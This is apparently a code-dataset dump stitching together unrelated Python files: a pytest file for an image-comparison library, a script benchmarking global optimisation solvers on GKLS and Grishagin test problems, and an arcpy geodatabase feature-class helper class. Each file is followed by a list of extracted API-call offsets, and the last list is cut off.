(['image_url'], {'stream': '(True)'}), '(image_url, stream=True)\n', (3178, 3202), False, 'import requests\n'), ((1034, 1071), 'os.path.join', 'join', (['CACHE_PATH', "('url_' + cache_hash)"], {}), "(CACHE_PATH, 'url_' + cache_hash)\n", (1038, 1071), False, 'from os.path import expanduser, join, exists, basename\n'), ((1084, 1100), 'os.path.exists', 'exists', (['cache_fn'], {}), '(cache_fn)\n', (1090, 1100), False, 'from os.path import expanduser, join, exists, basename\n'), ((1505, 1542), 'os.path.join', 'join', (['CACHE_PATH', "('url_' + cache_hash)"], {}), "(CACHE_PATH, 'url_' + cache_hash)\n", (1509, 1542), False, 'from os.path import expanduser, join, exists, basename\n'), ((1551, 1582), 'shutil.move', 'shutil.move', (['filename', 'cache_fn'], {}), '(filename, cache_fn)\n', (1562, 1582), False, 'import shutil\n'), ((3212, 3244), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (3230, 3244), False, 'from tempfile import NamedTemporaryFile\n'), ((803, 821), 'os.path.exists', 'exists', (['CACHE_PATH'], {}), '(CACHE_PATH)\n', (809, 821), False, 'from os.path import expanduser, join, exists, basename\n'), ((835, 863), 'os.makedirs', 'os.makedirs', (['CACHE_PATH', '(448)'], {}), '(CACHE_PATH, 448)\n', (846, 863), False, 'import os\n'), ((1126, 1143), 'os.stat', 'os.stat', (['cache_fn'], {}), '(cache_fn)\n', (1133, 1143), False, 'import os\n'), ((1172, 1214), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['file_stat.st_mtime'], {}), '(file_stat.st_mtime)\n', (1194, 1214), False, 'from datetime import datetime\n'), ((3064, 3083), 'os.path.basename', 'basename', (['image_url'], {}), '(image_url)\n', (3072, 3083), False, 'from os.path import expanduser, join, exists, basename\n'), ((4746, 4763), 'hashlib.sha256', 'sha256', (['image_url'], {}), '(image_url)\n', (4752, 4763), False, 'from hashlib import sha256\n')] |
from DocTest.CompareImage import CompareImage
import pytest
from pathlib import Path
import numpy
def test_single_png(testdata_dir):
img = CompareImage(testdata_dir / 'text_big.png')
assert len(img.opencv_images)==1
assert type(img.opencv_images)==list
type(img.opencv_images[0])==numpy.ndarray
def test_single_pdf(testdata_dir):
pass
def test_multipage_pdf(testdata_dir):
pass
def test_huge_pdf(testdata_dir):
pass
def test_image_text_content(testdata_dir):
pass
def test_pdf_text_content(testdata_dir):
pass
def test_non_existing_file(testdata_dir):
with pytest.raises(AssertionError):
img = CompareImage(testdata_dir / 'does_not_exist.png')
def test_corrupt_image(testdata_dir):
with pytest.raises(AssertionError):
img = CompareImage(testdata_dir / 'corrupt_image.png')
def test_corrupt_pdf(testdata_dir):
with pytest.raises(AssertionError):
img = CompareImage(testdata_dir / 'corrupt_pdf.pdf')
| [
"DocTest.CompareImage.CompareImage",
"pytest.raises"
]
| [((144, 187), 'DocTest.CompareImage.CompareImage', 'CompareImage', (["(testdata_dir / 'text_big.png')"], {}), "(testdata_dir / 'text_big.png')\n", (156, 187), False, 'from DocTest.CompareImage import CompareImage\n'), ((604, 633), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (617, 633), False, 'import pytest\n'), ((649, 698), 'DocTest.CompareImage.CompareImage', 'CompareImage', (["(testdata_dir / 'does_not_exist.png')"], {}), "(testdata_dir / 'does_not_exist.png')\n", (661, 698), False, 'from DocTest.CompareImage import CompareImage\n'), ((755, 784), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (768, 784), False, 'import pytest\n'), ((800, 848), 'DocTest.CompareImage.CompareImage', 'CompareImage', (["(testdata_dir / 'corrupt_image.png')"], {}), "(testdata_dir / 'corrupt_image.png')\n", (812, 848), False, 'from DocTest.CompareImage import CompareImage\n'), ((895, 924), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (908, 924), False, 'import pytest\n'), ((940, 986), 'DocTest.CompareImage.CompareImage', 'CompareImage', (["(testdata_dir / 'corrupt_pdf.pdf')"], {}), "(testdata_dir / 'corrupt_pdf.pdf')\n", (952, 986), False, 'from DocTest.CompareImage import CompareImage\n')] |
import functools
import numpy as np
import math
import argparse
import ags_solver
import go_problems
import nlopt
import sys
from Simple import SimpleTuner
import itertools
from scipy.spatial import Delaunay
from scipy.optimize import differential_evolution
from scipy.optimize import basinhopping
from sdaopt import sda
from stochopy import Evolutionary
from pyOpt import Optimization
from pyOpt import MIDACO
import pyOpt
from shgo import shgo
from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass
from benchmark_tools.plot import plot_cmcs
from benchmark_tools.stats import save_stats, compute_stats
class AGSWrapper(Solver):
def __init__(self, dist_stop, max_iters, class_name, eps=0.01, mixedFast=False):
params = self.class_name2params(class_name)
params.mixedFastMode = mixedFast
if dist_stop:
params.eps = 0
params.itersLimit = max_iters
self.solver = ags_solver.Solver()
self.solver.SetParameters(params)
self.dist_stop = dist_stop
self.eps = eps
def class_name2params(self, name):
params = ags_solver.Parameters()
if 'grish' in name:
params.r = 3
elif 'gklss2' in name:
params.r = 4.6
elif 'gklsh2' in name:
params.r = 6.5
elif 'gklss3' in name:
params.r = 3.7
elif 'gklsh3' in name:
params.r = 4.4
elif 'gklss4' in name:
params.r = 4.7
elif 'gklsh4' in name:
params.r = 4.9
elif 'gklss5' in name:
params.r = 4
params.evolventDensity = 10
elif 'gklsh5' in name:
params.r = 4
params.evolventDensity = 10
return params
def Solve(self, problem):
self.solver.SetProblem([lambda x: problem.Calculate(x)], *problem.GetBounds())
#self.solver.SetProblem(problem)
if not self.dist_stop:
point, val, idx = self.solver.Solve()
else:
opt_pt = np.array(problem.GetOptimumPoint())
point, val, idx = self.solver.Solve(lambda x: np.linalg.norm(np.array(x)-opt_pt, np.inf) < self.eps)
#calcCounters = self.solver.GetCalculationsStatistics()
calcCounters = problem.GetCalculationsStatistics()
return point, val, calcCounters
class SDAWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.class_name = class_name
def Solve(self, problem):
lb, ub = problem.GetBounds()
ret = sda(lambda x: problem.Calculate(x), None, bounds=list(zip(lb, ub)), \
seed=100, maxfun=self.max_iters, visit=2.72, maxiter=self.max_iters)
n_evals = problem.GetCalculationsStatistics()
return ret.x, ret.fun, n_evals
class SCBasinhoppingWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.class_name = class_name
def Solve(self, problem):
lb, ub = problem.GetBounds()
#pop_size = self.class_name2params(self.class_name)
class MyBounds(object):
def __init__(self, xmax=[1.1,1.1], xmin=[-1.1,-1.1] ):
self.xmax = np.array(xmax)
self.xmin = np.array(xmin)
def __call__(self, **kwargs):
x = kwargs["x_new"]
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
return tmax and tmin
x0 = [.5]*problem.GetDimension()
result = \
basinhopping(lambda x: problem.Calculate(x), x0, accept_test=MyBounds(ub, lb), seed=100, T=10, stepsize=0.3)
n_evals = problem.GetCalculationsStatistics()
return result.x, result.fun, n_evals
class SCDEWrapper(Solver):
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.class_name = class_name
def class_name2params(self, name):
if 'grish' in name:
popsize = 60
elif 'gklss2' in name:
popsize = 60
elif 'gklsh2' in name:
popsize = 60
elif 'gklss3' in name:
popsize = 70
elif 'gklsh3' in name:
popsize = 80
elif 'gklss4' in name:
popsize = 90
elif 'gklsh4' in name:
popsize = 100
elif 'gklss5' in name:
popsize = 120
elif 'gklsh5' in name:
popsize = 140
return popsize
def Solve(self, problem):
lb, ub = problem.GetBounds()
bounds = [(l, u) for l, u in zip(lb, ub)]
pop_size = self.class_name2params(self.class_name)
result = \
differential_evolution(
lambda x: problem.Calculate(x), bounds, mutation=(1.1,1.9),
tol=1e-12, maxiter=int(float(self.max_iters) / (pop_size*problem.GetDimension())), popsize=pop_size, disp=False, seed=100)
n_evals = problem.GetCalculationsStatistics()
return result.x, result.fun, n_evals
class PyEvolveWrapper(Solver):
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
def Solve(self, problem):
lb, ub = problem.GetBounds()
# Genome instance
genome = G1DList.G1DList(2)
genome.setParams(rangemin=lb[0], rangemax=ub[0], bestRawScore=-100, roundDecimal=2)
genome.initializator.set(Initializators.G1DListInitializatorReal)
genome.mutator.set(Mutators.G1DListMutatorRealGaussian)
# The evaluator function (objective function)
genome.evaluator.set(lambda x: problem.Calculate(x) + 100)
# Genetic Algorithm Instance
ga = GSimpleGA.GSimpleGA(genome)
ga.selector.set(Selectors.GRouletteWheel)
ga.minimax = Consts.minimaxType["minimize"]
ga.setGenerations(5000)
ga.setMutationRate(0.05)
ga.terminationCriteria.set(GSimpleGA.ConvergenceCriteria)
# Do the evolution, with stats dump
# frequency of 10 generations
ga.evolve(freq_stats=100)
# Best individual
best = ga.bestIndividual()
print ("\nBest individual score: %.2f" % (best.score - 100,))
print (best)
from bayes_opt import BayesianOptimization
class BOptWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
def Solve(self, problem):
lb, ub = problem.GetBounds()
bo = BayesianOptimization(lambda x, y: -problem.Calculate([x, y]),
{'x': (lb[0], ub[0]), 'y': (lb[1], ub[1])})
bo.maximize(init_points=5, n_iter=20, kappa=1.5)
n_evals = problem.GetCalculationsStatistics()
opt_val = -bo.res['max']['max_val']
opt_point = [bo.res['max']['max_params']['x'], bo.res['max']['max_params']['y']]
return opt_point, opt_val, n_evals
class SimpleWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.exploration = self.class_name2params(class_name)
def class_name2params(self, name):
if 'grish' in name:
return 0.1
elif 'gklss2' in name:
return 0.15
elif 'gklsh2' in name:
return 0.15
elif 'gklss3' in name:
return 0.15
elif 'gklsh3' in name:
return 0.25
elif 'gklss4' in name:
return 0.2
elif 'gklsh4' in name:
return 0.25
def Solve(self, problem):
objective_function = lambda x: -problem.Calculate(x)
lb, ub = problem.GetBounds()
opt_pt = problem.GetOptimumPoint()
bounds = [[l, u] for l, u in zip(lb, ub)]
points = np.array([point for point in itertools.product(*bounds)])
tri = Delaunay(points)
optimization_domain_vertices = points[tri.simplices]
exploration = self.exploration # optional, default 0.15
tuner = SimpleTuner(optimization_domain_vertices, objective_function, \
exploration_preference=exploration,
stop_criterion=lambda x:np.linalg.norm(np.array(x)-opt_pt, np.inf) < self.eps)
tuner.optimize(self.max_iters)
opt_val, opt_point = tuner.get_best()
#tuner.plot() # only works in 2D
n_evals = problem.GetCalculationsStatistics()
return opt_point, -opt_val, n_evals
class NLOptWrapper:
def __init__(self, dist_stop, max_iters, class_name, method=nlopt.GD_STOGO, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.method = method
self.max_iters = max_iters
self.pop_size = self.class_name2params(class_name)
def class_name2params(self, name):
if 'grish' in name:
popsize = 150
elif 'gklss2' in name:
popsize = 200
elif 'gklsh2' in name:
popsize = 400
elif 'gklss3' in name:
popsize = 1000
elif 'gklsh3' in name:
popsize = 2000
elif 'gklss4' in name:
popsize = 8000
elif 'gklsh4' in name:
popsize = 16000
elif 'gklss5' in name:
popsize = 25000
elif 'gklsh5' in name:
popsize = 30000
return popsize
def Solve(self, problem):
lb, ub = problem.GetBounds()
self.opt = nlopt.opt(self.method, problem.GetDimension())
self.opt.set_local_optimizer(nlopt.opt(nlopt.LN_SBPLX, problem.GetDimension()))
self.opt.set_lower_bounds(lb)
self.opt.set_upper_bounds(ub)
self.opt.set_min_objective(lambda x, grad: problem.Calculate(x))
self.opt.set_maxeval(self.max_iters)
self.opt.set_xtol_rel(1e-13)
if self.method == nlopt.GN_CRS2_LM:
self.opt.set_population(self.pop_size)
x = self.opt.optimize([.5]*problem.GetDimension())
minf = self.opt.last_optimum_value()
n_evals = problem.GetCalculationsStatistics()
return x, minf, n_evals
class StochOpyWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
self.popsize = self.class_name2params(class_name)
def class_name2params(self, name):
if 'grish' in name:
popsize = 60
elif 'gklss2' in name:
popsize = 60
elif 'gklsh2' in name:
popsize = 60
elif 'gklss3' in name:
popsize = 70
elif 'gklsh3' in name:
popsize = 80
elif 'gklss4' in name:
popsize = 90
elif 'gklsh4' in name:
popsize = 100
elif 'gklss5' in name:
popsize = 120
elif 'gklsh5' in name:
popsize = 140
return popsize
def Solve(self, problem):
objective_function = lambda x: 50 + problem.Calculate(x)
lb, ub = problem.GetBounds()
ea = Evolutionary(objective_function, lower=lb, upper=ub, popsize=self.popsize, \
max_iter=int(self.max_iters/self.popsize), eps1=1e-16, eps2=1e-16)
xopt, gfit = ea.optimize(solver='cpso', sync=False, CR=0.4, F=0.5)
n_evals = problem.GetCalculationsStatistics()
return xopt, gfit, n_evals
class PyOptWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
def Solve(self, problem):
objective_function = lambda x: [problem.Calculate(x), 0, 0]
lb, ub = problem.GetBounds()
opt_prob = pyOpt.Optimization('Problem', objective_function)
opt_prob.addObj('f')
for i in range(problem.GetDimension()):
opt_prob.addVar('x'+str(i),'c',lower=lb[i],upper=ub[i],value=(lb[i] + ub[i])/2.)
midaco_none = MIDACO(pll_type=None)
midaco_none.setOption('IPRINT',-1)
midaco_none.setOption('ISEED', 100)
midaco_none.setOption('MAXEVAL',self.max_iters)
midaco_none.setOption('FOCUS', -4)
fstr, xstr, inform = midaco_none(opt_prob)
n_evals = problem.GetCalculationsStatistics()
return xstr, fstr[0], n_evals
class SHGOWrapper:
def __init__(self, dist_stop, max_iters, class_name, eps=0.01):
self.dist_stop = dist_stop
self.eps = eps
self.max_iters = max_iters
def Solve(self, problem):
objective_function = lambda x: problem.Calculate(x)
bounds = zip(*problem.GetBounds())
opts = {'maxfev': self.max_iters}
result = shgo(objective_function, bounds, options=opts)
n_evals = problem.GetCalculationsStatistics()
return result.x, result.fun, n_evals
algos = {'scd': SCDEWrapper, 'ags': AGSWrapper,
'agsd': functools.partial(AGSWrapper, mixedFast=True),
'direct': functools.partial(NLOptWrapper, method=nlopt.GN_ORIG_DIRECT),
'directl': functools.partial(NLOptWrapper, method=nlopt.GN_ORIG_DIRECT_L),
'stogo': functools.partial(NLOptWrapper, method=nlopt.GD_STOGO),
'mlsl': functools.partial(NLOptWrapper, method=nlopt.G_MLSL_LDS),
'crs': functools.partial(NLOptWrapper, method=nlopt.GN_CRS2_LM),
'simple': SimpleWrapper, 'scb': SCBasinhoppingWrapper,
'sda': SDAWrapper, 'stochopy': StochOpyWrapper, 'shgo': SHGOWrapper,
'pyopt': PyOptWrapper}
algo2cature = {'scd': 'Scipy DE', 'ags': 'AGS', 'direct': 'DIRECT', 'agsd': 'AGSd',
'directl': 'DIRECTl', 'simple': 'Simple',
'stogo': 'StoGO', 'mlsl': 'MLSL', 'crs':'CRS', 'scb': 'Scipy B-H',
'sda': 'SDA', 'stochopy': 'Stochopy', 'pysot': 'PySOT', 'pyopt': 'PyOpt', 'shgo': 'SHGO'}
serg_eps = {2: 0.01, 3: 0.01, 4: math.pow(1e-6, 1./4), 5: math.pow(1e-7, 1./5)}
def main(args):
wrapper_class = algos[args.algo]
if args.problems_class == 'grish':
problems = GrishClass()
else:
assert args.problems_dim > 1 and args.problems_dim < 6
if args.problems_class == 'gklss':
problems = GKLSClass(args.problems_dim, go_problems.GKLSClass.Simple)
else:
problems = GKLSClass(args.problems_dim, go_problems.GKLSClass.Hard)
eps = 0.01
if args.serg_eps:
eps = serg_eps[args.problems_dim]
wrapper = wrapper_class(args.dist_stop, args.max_iters, args.problems_class+str(args.problems_dim), eps=0.01)
calc_stats, solved_status = solve_class(problems, wrapper, verbose=args.verbose, eps_check=eps)
stats = compute_stats(calc_stats, solved_status)
print('Problems solved: {}'.format(stats['num_solved']))
for i, avg in enumerate(stats['avg_calcs'][:-1]):
print('Average number of calculations of constraint #{}: {}'.format(i, avg))
print('Average number of calculations of objective: {}'.format(stats['avg_calcs'][-1]))
#plot_cmcs([stats['cmc']], captures=[algo2cature(args.algo)], show=True, filename='')
save_stats(stats, args.stats_fname, capture=algo2cature[args.algo])
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sample for AGS solver')
parser.add_argument('--max_iters', type=int, default=10000, help='limit of iterations for the method')
parser.add_argument('--problems_class', type=str, choices=['grish','gklss','gklsh'], default='grish')
parser.add_argument('--algo', type=str, choices=algos.keys(), default='scd')
parser.add_argument('--problems_dim', type=int, default=2)
parser.add_argument('--verbose', action='store_true', help='Print additional info to console')
parser.add_argument('--dist_stop', action='store_true', help='Stop algorithm then the next point is close enough to the optimum')
parser.add_argument('--serg_eps', action='store_true')
parser.add_argument('--stats_fname', type=str, default='')
main(parser.parse_args())
| [
"benchmark_tools.core.solve_class",
"argparse.ArgumentParser",
"benchmark_tools.core.GrishClass",
"math.pow",
"benchmark_tools.stats.save_stats",
"benchmark_tools.stats.compute_stats",
"itertools.product",
"benchmark_tools.core.GKLSClass",
"numpy.array",
"functools.partial",
"shgo.shgo",
"pyOpt.MIDACO",
"scipy.spatial.Delaunay",
"ags_solver.Solver",
"numpy.all",
"ags_solver.Parameters",
"pyOpt.Optimization"
]
| [((13158, 13203), 'functools.partial', 'functools.partial', (['AGSWrapper'], {'mixedFast': '(True)'}), '(AGSWrapper, mixedFast=True)\n', (13175, 13203), False, 'import functools\n'), ((13224, 13284), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.GN_ORIG_DIRECT'}), '(NLOptWrapper, method=nlopt.GN_ORIG_DIRECT)\n', (13241, 13284), False, 'import functools\n'), ((13306, 13368), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.GN_ORIG_DIRECT_L'}), '(NLOptWrapper, method=nlopt.GN_ORIG_DIRECT_L)\n', (13323, 13368), False, 'import functools\n'), ((13388, 13442), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.GD_STOGO'}), '(NLOptWrapper, method=nlopt.GD_STOGO)\n', (13405, 13442), False, 'import functools\n'), ((13461, 13517), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.G_MLSL_LDS'}), '(NLOptWrapper, method=nlopt.G_MLSL_LDS)\n', (13478, 13517), False, 'import functools\n'), ((13535, 13591), 'functools.partial', 'functools.partial', (['NLOptWrapper'], {'method': 'nlopt.GN_CRS2_LM'}), '(NLOptWrapper, method=nlopt.GN_CRS2_LM)\n', (13552, 13591), False, 'import functools\n'), ((14130, 14154), 'math.pow', 'math.pow', (['(1e-06)', '(1.0 / 4)'], {}), '(1e-06, 1.0 / 4)\n', (14138, 14154), False, 'import math\n'), ((14155, 14179), 'math.pow', 'math.pow', (['(1e-07)', '(1.0 / 5)'], {}), '(1e-07, 1.0 / 5)\n', (14163, 14179), False, 'import math\n'), ((14821, 14888), 'benchmark_tools.core.solve_class', 'solve_class', (['problems', 'wrapper'], {'verbose': 'args.verbose', 'eps_check': 'eps'}), '(problems, wrapper, verbose=args.verbose, eps_check=eps)\n', (14832, 14888), False, 'from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass\n'), ((14901, 14941), 'benchmark_tools.stats.compute_stats', 'compute_stats', (['calc_stats', 'solved_status'], {}), '(calc_stats, solved_status)\n', (14914, 14941), False, 'from benchmark_tools.stats import save_stats, compute_stats\n'), ((15330, 15397), 'benchmark_tools.stats.save_stats', 'save_stats', (['stats', 'args.stats_fname'], {'capture': 'algo2cature[args.algo]'}), '(stats, args.stats_fname, capture=algo2cature[args.algo])\n', (15340, 15397), False, 'from benchmark_tools.stats import save_stats, compute_stats\n'), ((15439, 15499), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Sample for AGS solver"""'}), "(description='Sample for AGS solver')\n", (15462, 15499), False, 'import argparse\n'), ((944, 963), 'ags_solver.Solver', 'ags_solver.Solver', ([], {}), '()\n', (961, 963), False, 'import ags_solver\n'), ((1121, 1144), 'ags_solver.Parameters', 'ags_solver.Parameters', ([], {}), '()\n', (1142, 1144), False, 'import ags_solver\n'), ((8158, 8174), 'scipy.spatial.Delaunay', 'Delaunay', (['points'], {}), '(points)\n', (8166, 8174), False, 'from scipy.spatial import Delaunay\n'), ((11978, 12027), 'pyOpt.Optimization', 'pyOpt.Optimization', (['"""Problem"""', 'objective_function'], {}), "('Problem', objective_function)\n", (11996, 12027), False, 'import pyOpt\n'), ((12220, 12241), 'pyOpt.MIDACO', 'MIDACO', ([], {'pll_type': 'None'}), '(pll_type=None)\n', (12226, 12241), False, 'from pyOpt import MIDACO\n'), ((12946, 12992), 'shgo.shgo', 'shgo', (['objective_function', 'bounds'], {'options': 'opts'}), '(objective_function, bounds, options=opts)\n', (12950, 12992), False, 'from shgo import shgo\n'), ((14290, 14302), 'benchmark_tools.core.GrishClass', 'GrishClass', ([], {}), '()\n', (14300, 14302), False, 'from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass\n'), ((14442, 14500), 'benchmark_tools.core.GKLSClass', 'GKLSClass', (['args.problems_dim', 'go_problems.GKLSClass.Simple'], {}), '(args.problems_dim, go_problems.GKLSClass.Simple)\n', (14451, 14500), False, 'from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass\n'), ((14538, 14594), 'benchmark_tools.core.GKLSClass', 'GKLSClass', (['args.problems_dim', 'go_problems.GKLSClass.Hard'], {}), '(args.problems_dim, go_problems.GKLSClass.Hard)\n', (14547, 14594), False, 'from benchmark_tools.core import Solver, solve_class, GrishClass, GKLSClass\n'), ((3378, 3392), 'numpy.array', 'np.array', (['xmax'], {}), '(xmax)\n', (3386, 3392), True, 'import numpy as np\n'), ((3421, 3435), 'numpy.array', 'np.array', (['xmin'], {}), '(xmin)\n', (3429, 3435), True, 'import numpy as np\n'), ((3542, 3564), 'numpy.all', 'np.all', (['(x <= self.xmax)'], {}), '(x <= self.xmax)\n', (3548, 3564), True, 'import numpy as np\n'), ((3594, 3616), 'numpy.all', 'np.all', (['(x >= self.xmin)'], {}), '(x >= self.xmin)\n', (3600, 3616), True, 'import numpy as np\n'), ((8115, 8141), 'itertools.product', 'itertools.product', (['*bounds'], {}), '(*bounds)\n', (8132, 8141), False, 'import itertools\n'), ((2144, 2155), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (2152, 2155), True, 'import numpy as np\n'), ((8487, 8498), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (8495, 8498), True, 'import numpy as np\n')] |
import arcpy
import logging
import pathlib
import subprocess
import gdb
import cx_sde
class Fc(object):
def __init__(self
,gdb
,name):
# gdb object
self.gdb = gdb
# ex BUILDING
self.name = name.upper()
# esri tools usually expect this C:/sdefiles/bldg.sde/BUILDING
# also acceptable: C:/sdefiles/bldg.sde/BLDG.BUILDING
self.featureclass = self.gdb.sdeconn + "/" + self.name
def getfields(self):
desc = arcpy.Describe(self.featureclass)
fields = desc.fields
fieldsameslist = []
for field in fields:
fieldsameslist.append(field.name)
return fieldsameslist
def exists(self):
return arcpy.Exists(self.featureclass)
def delete(self):
logging.info('deleting {0}'.format(self.name))
desc = arcpy.Describe(self.featureclass)
if desc.IsArchived == True:
# disable archving and axe the _H table
arcpy.DisableArchiving_management(self.featureclass,
'DELETE')
arcpy.Delete_management(self.featureclass)
def locksexist(self):
if arcpy.TestSchemaLock(self.featureclass):
# "True A schema lock can be applied to the dataset"
return False
else:
return True
def interpret(self
,resobject):
# could also work with resobject.status
output = 0
if 'succeeded' not in resobject.getMessages().lower():
output = 1
logging.warn('response code is {0}'.format(resobject.status))
logging.warn('response messages are {0}'.format(resobject.getMessages()))
return output
def version(self):
# https://pro.arcgis.com/en/pro-app/tool-reference/data-management/register-as-versioned.htm
logging.info('versioning {0}'.format(self.name))
arcpy.RegisterAsVersioned_management(self.featureclass
,"NO_EDITS_TO_BASE")
# https://support.esri.com/en/technical-article/000023226
# When an ArcGIS 10.8 / ArcGIS Pro 2.5 (or newer) client connects to a
# 10.7.1, or earlier, release of an Enterprise geodatabase in Oracle,
# and registers the data as versioned, the versioned view is not created
# for the associated table or feature class.
# I cant get this shell out to python27 to work
# so like I dummy I'm gonna print it to the screen for now
# the test will fail until I (or esri) get it right, thats honest at least
py2versionedviews = pathlib.Path(__file__).parent.parent \
.joinpath('py27') \
.joinpath('create_versionedviews.py')
# see gdb class for this path, perhaps 'C:\Python27\ArcGIS10.6'
callcmd = r'{0} {1} {2}'.format(self.gdb.arcpy2path, py2versionedviews, self.name)
logging.info('YOU MUST CREATE versioned views from py27 using {0}'.format(callcmd))
logging.info('YOU YES YOU MUST call this: {0}'.format(callcmd))
# From a script run a postprocess something like:
# C:\Python27\ArcGIS10.6\python.exe C:\matt_projects\geodatabase-toiler\src\py27\create_versionedviews.py TOILERTESTFC
# exit_code = subprocess.call(callcmd,shell=True)
# exit_code = subprocess.run([self.gdb.arcpy2path, 'C:\matt_projects\geodatabase-toiler\src\py27\create_versionedviews.py'])
# subprocess.Popen(["virtualenv1/bin/python", "my_script.py"])
# attempts above yield
# File "C:\Program Files\ArcGIS\Pro\bin\Python\envs\arcgispro-py3\Lib\site.py", line 177
#file=sys.stderr)
# ^
# SyntaxError: invalid syntax
def trackedits(self):
# https://pro.arcgis.com/en/pro-app/tool-reference/data-management/enable-editor-tracking.htm
# this will create fields only if they dont exist
# I am gonna fix the field names here. Reminder that our goal is to
# be opinionated and consistent across anything we manage
logging.info('enabling editor tracking on {0}'.format(self.name))
return self.interpret(arcpy.EnableEditorTracking_management(self.featureclass
,'CREATED_USER'
,'CREATED_DATE'
,'LAST_EDITED_USER'
,'LAST_EDITED_DATE'
,'NO_ADD_FIELDS'
,'UTC'))
def grantprivileges(self
,user
,edits='GRANT'): # or AS_IS
# https://pro.arcgis.com/en/pro-app/tool-reference/data-management/change-privileges.htm
# caller should know who editors are we dont concern ourselves here
# always grant select, edits are GRANT or AS_IS for grant select only
# The nobs and dials on this tool are confounding
logging.info('granting privileges on {0} to {1}'.format(self.name
,user))
return self.interpret(arcpy.ChangePrivileges_management(self.featureclass
,user
,'GRANT'
,edits))
def index(self
,column):
# https://pro.arcgis.com/en/pro-app/tool-reference/data-management/add-attribute-index.htm
# unique indexes cant be specified for multiversioned tables
logging.info('indexing column {0} on {1}'.format(column
,self.name))
# BUILDINGBINIX
# BUILDING_HISTORICDOITT_IDIX = 27 careful friend
return self.interpret(arcpy.AddIndex_management(self.featureclass
,column
,'{0}{1}{2}'.format(self.name
,column
,'IX')))
def analyze(self
,components=['BUSINESS','ADDS','DELETES']):
return self.interpret(arcpy.Analyze_management(self.featureclass
,components))
def rebuildindexes(self):
# https://pro.arcgis.com/en/pro-app/latest/tool-reference/data-management/rebuild-indexes.htm
return self.interpret(arcpy.RebuildIndexes_management(self.gdb.sdeconn
,'NO_SYSTEM'
,self.name
,'ALL'))
def enablearchiving(self):
desc = arcpy.Describe(self.featureclass)
if desc.IsArchived == False:
return self.interpret(arcpy.EnableArchiving_management(self.featureclass))
else:
return 0
def exporttoshp(self
,outputdir
,outputname):
# print('fc2fc {0} {1} {2}'.format(self.featureclass, outputdir, outputname))
arcpy.FeatureClassToFeatureClass_conversion(self.featureclass
,outputdir
,outputname)
# TODO exportogeopackage if ESRI ever fills in some functionality in
# https://pro.arcgis.com/en/pro-app/latest/tool-reference/conversion/an-overview-of-the-to-geopackage-toolset.htm
# TODO exportogeojson if ESRI tool does something other than error 99999 (guess: sdo_geometry not supported)
# For now export to shp, then ogr2ogr to other formats. Classic
| [
"arcpy.EnableEditorTracking_management",
"arcpy.RegisterAsVersioned_management",
"arcpy.ChangePrivileges_management",
"pathlib.Path",
"arcpy.Describe",
"arcpy.TestSchemaLock",
"arcpy.FeatureClassToFeatureClass_conversion",
"arcpy.RebuildIndexes_management",
"arcpy.Exists",
"arcpy.Analyze_management",
"arcpy.Delete_management",
"arcpy.DisableArchiving_management",
"arcpy.EnableArchiving_management"
]
| [((513, 546), 'arcpy.Describe', 'arcpy.Describe', (['self.featureclass'], {}), '(self.featureclass)\n', (527, 546), False, 'import arcpy\n'), ((749, 780), 'arcpy.Exists', 'arcpy.Exists', (['self.featureclass'], {}), '(self.featureclass)\n', (761, 780), False, 'import arcpy\n'), ((877, 910), 'arcpy.Describe', 'arcpy.Describe', (['self.featureclass'], {}), '(self.featureclass)\n', (891, 910), False, 'import arcpy\n'), ((1140, 1182), 'arcpy.Delete_management', 'arcpy.Delete_management', (['self.featureclass'], {}), '(self.featureclass)\n', (1163, 1182), False, 'import arcpy\n'), ((1222, 1261), 'arcpy.TestSchemaLock', 'arcpy.TestSchemaLock', (['self.featureclass'], {}), '(self.featureclass)\n', (1242, 1261), False, 'import arcpy\n'), ((1982, 2057), 'arcpy.RegisterAsVersioned_management', 'arcpy.RegisterAsVersioned_management', (['self.featureclass', '"""NO_EDITS_TO_BASE"""'], {}), "(self.featureclass, 'NO_EDITS_TO_BASE')\n", (2018, 2057), False, 'import arcpy\n'), ((7326, 7359), 'arcpy.Describe', 'arcpy.Describe', (['self.featureclass'], {}), '(self.featureclass)\n', (7340, 7359), False, 'import arcpy\n'), ((7722, 7811), 'arcpy.FeatureClassToFeatureClass_conversion', 'arcpy.FeatureClassToFeatureClass_conversion', (['self.featureclass', 'outputdir', 'outputname'], 